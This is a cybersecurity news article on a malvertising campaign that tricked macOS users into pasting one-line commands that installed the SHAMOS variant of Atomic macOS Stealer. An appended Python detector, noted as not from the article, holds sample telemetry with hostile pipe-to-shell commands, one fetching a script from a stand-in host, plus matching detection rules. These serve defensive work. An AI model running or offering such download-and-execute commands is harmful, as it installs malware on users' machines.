KP Cybersecurity news

Hundreds Targeted in New Atomic macOS Stealer Campaign

CrowdStrike warns of a spike in attacks aimed at infecting macOS users with a variant of the infamous Atomic macOS Stealer (AMOS) information stealer.

Between June and August, the cybercrime group Cookie Spider, which operates the AMOS malware-as-a-service (MaaS) enterprise, used malvertising to direct victims to fraudulent help websites and trick them into installing the malware.

The campaign, CrowdStrike says, targeted users who were searching for solutions to common macOS issues, and relied on promoting fraudulent advertisements for websites where victims were instructed to execute a malicious command on their systems.

The command fetched a Bash script from a remote server; the script captured the victim’s password and then downloaded an executable from a second remote location.

Dubbed SHAMOS, the payload is a variant of AMOS that contains anti-VM checks to prevent execution in a sandboxed environment, and which can perform reconnaissance and data collection tasks.

The malware searches the system for files that contain credentials, data from Keychain, AppleNotes, browsers, and known cryptocurrency wallets, and attempts to exfiltrate them to a remote server, packed in a ZIP archive.

Additionally, SHAMOS can download and execute payloads, including a botnet module and a fake Ledger Live wallet application.

The malvertising campaign targeted users in Canada, China, Colombia, Italy, Japan, Mexico, the US, the UK, and other countries, but was not served to Russian users.

CrowdStrike’s investigation revealed that the cybercriminals likely impersonated a legitimate Australia-based electronics store in their Google Advertising profile.

“This campaign underscores the popularity of malicious one-line installation commands among eCrime actors. This technique allows them to bypass Gatekeeper security checks and install the Mach-O executable directly onto victim devices,” CrowdStrike notes.
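As an added example (not code from the article or from CrowdStrike’s report), the following Python detector flags the “one-line install” pattern described above in process-launch telemetry: a shell started with `-c` whose script pipes a `curl`/`wget` download, or a decoded blob, straight into another shell. The JSON record format, field names and hostnames are constructed assumptions, not indicators from the campaign.

```python
import json
import shlex

SHELLS = {"sh", "bash", "zsh", "dash"}
DOWNLOADERS = {"curl", "wget"}
DECODERS = {"base64", "openssl", "xxd"}

# Constructed process-launch telemetry (one JSON record per exec), in the
# shape an EDR or osquery-style process_events feed might provide.
SAMPLE_EVENTS = """\
{"ts":"2025-07-01T10:02:11Z","user":"alice","cmd":"/bin/zsh -c 'curl -fsSL https://fake-help.example/fix.sh | bash'"}
{"ts":"2025-07-01T10:02:12Z","user":"alice","cmd":"/bin/bash -c 'echo aWQ= | base64 -d | sh'"}
{"ts":"2025-07-01T10:05:40Z","user":"bob","cmd":"/bin/bash -c 'curl -fsSL https://docs.example/notes.txt -o notes.txt'"}
{"ts":"2025-07-01T10:06:00Z","user":"bob","cmd":"/bin/bash -c 'ls | grep foo'"}
"""

def _program(stage):
    """Basename of the first token of one pipeline stage ('' if unparsable)."""
    try:
        toks = shlex.split(stage)
    except ValueError:
        return ""
    return toks[0].rsplit("/", 1)[-1] if toks else ""

def inner_command(cmd):
    """Return the script passed as `<shell> -c '<script>'`, else the command itself."""
    try:
        toks = shlex.split(cmd)
    except ValueError:
        return cmd
    if len(toks) >= 3 and _program(toks[0]) in SHELLS and toks[1] == "-c":
        return toks[2]
    return cmd

def classify_pipeline(script):
    """Name the risky pattern if the pipeline's last stage is a shell fed by a downloader or decoder."""
    stages = [s.strip() for s in script.split("|") if s.strip()]
    if len(stages) < 2 or _program(stages[-1]) not in SHELLS:
        return None
    heads = {_program(s) for s in stages[:-1]}
    if heads & DOWNLOADERS:
        return "remote-script-piped-to-shell"
    if heads & DECODERS:
        return "decoded-payload-piped-to-shell"
    return None

def find_pipe_to_shell(jsonl):
    """Scan JSON-lines telemetry and return the events matching a pipe-to-shell pattern."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        reason = classify_pipeline(inner_command(ev["cmd"]))
        if reason:
            hits.append({"ts": ev["ts"], "user": ev["user"], "reason": reason, "cmd": ev["cmd"]})
    return hits

if __name__ == "__main__":
    for hit in find_pipe_to_shell(SAMPLE_EVENTS):
        print(hit["ts"], hit["user"], hit["reason"], hit["cmd"])
```

A plain `curl -o file` download and an ordinary `ls | grep` pipeline are deliberately left unflagged, so the rule keys on the download-or-decode-then-execute chain rather than on `curl` alone.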

This article was originally published by Security Week. Please check their website for the original content.
